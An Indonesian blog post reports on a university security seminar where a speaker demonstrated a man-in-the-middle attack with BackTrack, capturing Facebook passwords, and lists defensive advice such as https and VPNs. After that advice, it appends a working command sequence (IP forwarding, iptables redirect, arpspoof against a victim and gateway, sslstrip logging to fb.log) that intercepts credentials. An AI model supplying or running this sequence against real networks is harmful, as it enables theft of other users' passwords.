Skip to main content

Possibility Hacking: MitM Attack Menggunakan BackTrack

Ide awalnya saya ingin menulis ini saat acara berlangsung. Berhubung acaranya sangat menarik, membuat saya jadi tidak sempat untuk menulis langsung saat acara. Kebetulan saya juga ikut melakukan demo yang dilakukan nara sumber.

Seminar tentang keamanan yang diselenggarakan oleh Himpunan Mahasiswa Teknik Informatika UPN "Veteran" Yogyakarta menghadirkan 2 narasumber dari Komunitas BackTrack Indonesia, +AbrĂ£o Ximenes dan Hat Secure, +novizul evendi  . Topik yang disampaikan oleh Abrao selaku nara sumber pertama adalah tentang Man in the Middle (MitM) Attack. Di awal Abrao menjelaskan konsep dasar MitM Attack yang tanpa disadari oleh orang lain. Konsep dasar tersebut dapat Anda baca lebih lanjut di  http://www.ilmuhacking.com/basic-concept/mengenal-serangan-man-in-the-middle-mitm/.
Abrao Saat Menyampaikan Materi
Tidak sekedar mengupas atau menjelaskan konsep dasar Abrao mendemokan MitM Attack menggunakan BackTrack. Terlihat jelas saat mendemokan harus mempunyai kemampuan dasar tentang sistem operasi Linux karena BackTrack merupakan sistem operasi berbasis Linux. Dalam hal ini sistem operasi Ubuntu yang telah dikustomisasi untuk keamanan sistem dan jaringan komputer. Tidak lupa Abrao mengenalkan beberapa alat bantu yang tersedia di BackTrack.

Saat sesi demonstrasi, cukup mengagetkan dalam hitungan detik saat ada orang yang mengakses Facebook langsung tercatat password dari sang pengakses. Kebetulan Abrao telah menjalankan proses penyerangan dengan menggunakan alat bantu yang sudah tersedia di  sistem operasi BackTrack. Jika saat ini peserta membawa notebook bisa mencoba BackTrack secara langsung karena sudah disediakan CD BackTrack oleh panitia penyelenggara. 

Melihat demonstrasi tersebut membuat kita harus lebih waspada saat mengakses sebuah situs web. Abrao memberikan sarankan, supaya kita lebih berhati-hati dan cermat dalam mengakses situs web. Adapun sarannya sebagai berikut:
1. Memastikan konten dan alamat yang dituju menggunakan protokol  aman contohnya: https
2. Menggunakan komunikasi data pribadi seperti akses broadband atau 
3. Menggunakan Virtual Private Network.  
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo arpspoof -i wlan0 192.168.0.102 192.168.0.254
sudo sslstrip -a -w ~/fb.log
selamat membaca log




Labels:

Comments

Post a Comment

Popular posts from this blog

Kesalahan Dispenser

Pada umumnya beberapa orang menyebut dispenser mengikuti istilah pada KBBI yaitu peranti elektronik yg secara otomatis dapat memanaskan dan mendinginkan air yang siap diminum. Ternyata ada istilah lain menurut KBBI yaitu mesin penjual atau mesin penyaji. 27 Desember 2013 saya melihat Anjungan Tunai Mandiri (ATM) dari Bank CIMB Niaga sepi dari antrian. Masuklah ke ruangan yang lebih besar dibanding ruang ATM lainnya. Berencana mengambil uang namun gagal, dicoba berulang-ulang ternyata masih gagal dengan pesan galat: Transaksi tidak dapat diproses karena kesalahan dispenser Pertama melihat pesan tersebut pasti merasa aneh, kok dispenser ngeluarin uang, air dong yang dikeluarkan . Termasuk saya yang merasa aneh dengan pesan galat tersebut. Merujuk KBBI saya masih merenungi arti dispenser yang digunakan Bank CIMB Niaga dalam mesin ATM.
Post a Comment
Read more

Jalur Alternatif Wonosobo Jogja

Mudik tahun ini mencoba jalur baru. Pengamatan saya Wonosobo hanya mempunyai 2 tugu penyambutan yaitu di sebelah timur perbatasan dengan Temanggung dan diselatan perbatasan dengan Banjarnegara. Namun akses keluar masuk Wonosobo cukup banyak. Kali ini arus balik kami dimulai dari rumah Wonobungkah menuju Kaliwiro. Ternyata dari Kaliwiro ada jalur yang baru selesai diperbaiki menuju Sapuran. Dari Sapuran ini bisa melalui jalur altenatif ke Magelang ataupun Jogja. Ada 2 jalur yang dapat dipilih dari Kaliwiro : Wonosobo - Kaliwiro - Kali Bawang - Sapuran - Slentho - Salaman - Muntilan - Sleman - Jogja Wonosobo - Kaliwiro - Winong Sari - Pasar Kertek - Sapuran - Slentho - Salaman - Muntilan - Sleman - Jogja Kami memilih jalur yang pertama. Jalannya sudah bagus walaupun ada kekurangannya yaitu sempit, naik turun, tikungan tajam, dan samping jurang. Jarang ditemukan aspal yang rusak, ada sedikit rusak namun tidak mengganggu perjalanan. Bagi yang terbiasa mabuk darat, mungkin bisa langsung
Post a Comment
Read more

Menutup Rekening Bank Permata

Mulai tanggal 23 Desember 2008 saya sudah menutup rekening di Bank Permata . Saya menggunakan Bank Permata sebagai payroll dari PT Trikomsel Multimedia . Sejak saya pindah ke Jogja sudah tidak efektif rekening tersebut. Payroll saya pindah ke Bank Mandiri . Untung sudah mempunyai rekening Bank Mandiri sejak tahun 2001. Beberapa alasan saya menutup rekening Bank Permata : - Tidak lagi sebagai payroll lagi. - Tidak ada transaksi yang berarti lagi. - E-Banking-nya tidak bisa di buka di Firefox karena menggunakan ActiveX. Daripada tiap bulan saya terkena biaya administrasi akhir diputuskan untuk ditutup. Mungkin kalau masih bisa dibuka di Firefox saya bisa mempertimbangkan untuk menutupnya. Bank Permata yang masih 1 group dengan Astra tentunya masih menggunakan kebijakan yang berbasis Microsoft . Proses untuk menutup saya cukup mengambil uang yang disisakan sekitar Rp. 100.000. Saya membuka rekening di Bank Permata cabang pembantu Jln. Abdul Muis Jakarta Pusat. Menurut CS-nya untuk me
Post a Comment
Read more